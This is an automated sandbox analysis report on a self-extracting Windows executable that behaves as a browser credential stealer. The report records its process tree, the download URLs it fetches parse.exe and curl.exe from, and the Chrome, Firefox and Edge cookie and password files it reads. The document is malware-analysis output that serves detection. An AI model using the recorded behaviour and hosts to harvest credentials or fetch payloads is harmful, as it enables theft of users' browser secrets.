Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 23, 2021, 10:04 a.m.	April 23, 2021, 10:12 a.m.

Size	2.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`71832d24f95c424d77fd887d9abbb0f0`
SHA256	`44f933c8ab6dd6894c4f8b95bf926721c9788bbe5cd4a30a11e6a216de5c8338`
CRC32	`C448040A`
ssdeep	`49152:YbA3DHbwNCkOZ8m1aQs4FPYT0q/hOjYBwIUSwAU+SC:Ybn0kSakEhelbtTC`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) IsPacked - Entropy Check HasOverlay - Overlay Check HasDebugData - DebugData Check HasRichSignature - Rich Signature Check escalate_priv - Escalade priviledges screenshot - Take screenshot win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile

request1.exe "C:\Users\test22\AppData\Local\Temp\request1.exe"
3236
- main.exe "C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe"
  4232
  - parse.exe parse.exe -f json -b firefox
    3660
  - parse.exe parse.exe -f json -b chrome
    2848
  - parse.exe parse.exe -f json -b edge
    4792
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
get.geojs.io	A 104.26.0.100 A 104.26.1.100 A 172.67.70.233	104.26.0.100
www.cif96be750.com	A 35.220.162.170	35.220.162.170

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
172.67.70.233	Active	Moloch
35.220.162.170	Active	Moloch
35.220.235.49	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 35.220.162.170:80 -> 192.168.56.102:49813	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 35.220.162.170:80 -> 192.168.56.102:49814	2014819	ET INFO Packed Executable Download	Misc activity
TCP 35.220.162.170:80 -> 192.168.56.102:49814	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49811 172.67.70.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	e8:2c:6d:12:8c:c5:ce:c7:42:39:90:96:aa:d5:c8:a2:5f:50:74:73

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:185: error Firefox find bookmark file failed, ERR:find places.sqlite failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:185: error Firefox find cookie file failed, ERR:find cookies.sqlite failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:185: error Firefox find history file failed, ERR:find places.sqlite failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:179: error Firefox find password file failed, ERR:find logins.json failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:132: error Chrome find bookmark file failed, ERR:find Bookmarks failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: [x]: Get 2 cookies, filename is results/chrome_cookie.json console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: [x]: Get 0 passwords, filename is results/chrome_password.json console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: cmd.go:53: error open C:\Users\test22/AppData/Local/Microsoft/Edge/User Data/Local State: The system cannot find the path specified. console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:132: error Microsoft Edge find bookmark file failed, ERR:find Bookmarks failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:132: error Microsoft Edge find cookie file failed, ERR:find Cookies failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:132: error Microsoft Edge find history file failed, ERR:find History failed console_handle: 0x0000000000000007	1	1
WriteConsoleW April 23, 2021, 9:58 a.m.	buffer: browser.go:132: error Microsoft Edge find password file failed, ERR:find Login Data failed console_handle: 0x0000000000000007	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Performs some HTTP requests (2 events)

request	GET http://www.cif96be750.com/pkasdq/parse.exe
request	GET http://www.cif96be750.com/pkasdq/curl.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1296 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 23, 2021, 10:04 a.m.	process_identifier: 3236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 585728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140001000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000014008e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000014008e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140000000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 409600 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140001000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 409600 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140001000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140086000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140086000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 266240 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000001401ae000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 23, 2021, 9:57 a.m.	process_identifier: 4232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000140065000 process_handle: 0xffffffffffffffff	1

Steals private information from local Internet browsers (50 out of 72 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Browser
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Floc
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\

Foreign language identified in PE resource (27 events)

name

PNG

language

LANG_CHINESE

filetype

PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006418c

size

0x000015a9

name

PNG

language

LANG_CHINESE

filetype

PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006418c

size

0x000015a9

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_ICON

language

LANG_CHINESE

filetype

PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006aea8

size

0x00003d71

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_DIALOG

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006f324

size

0x000001e6

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_STRING

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fc3c

size

0x00000078

name

RT_GROUP_ICON

language

LANG_CHINESE

filetype

data

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fcb4

size

0x00000068

name

RT_MANIFEST

language

LANG_CHINESE

filetype

XML 1.0 document, ASCII text, with CRLF line terminators

sublanguage

SUBLANG_CHINESE_SIMPLIFIED

offset

0x0006fd1c

size

0x00000753

Creates executable files on the filesystem (13 events)

file	C:\Users\test22\AppData\Local\Temp\RarSFX0\curl.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\edge-set.reg
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome7.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\edge.reg
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome-set.reg
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\edge64.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome.reg
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\parse.exe
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome86.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\edge86.bat
file	C:\Users\test22\AppData\Local\Temp\RarSFX0\chrome64.bat

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\RarSFX0\main.exe

An executable file was downloaded by the process main.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
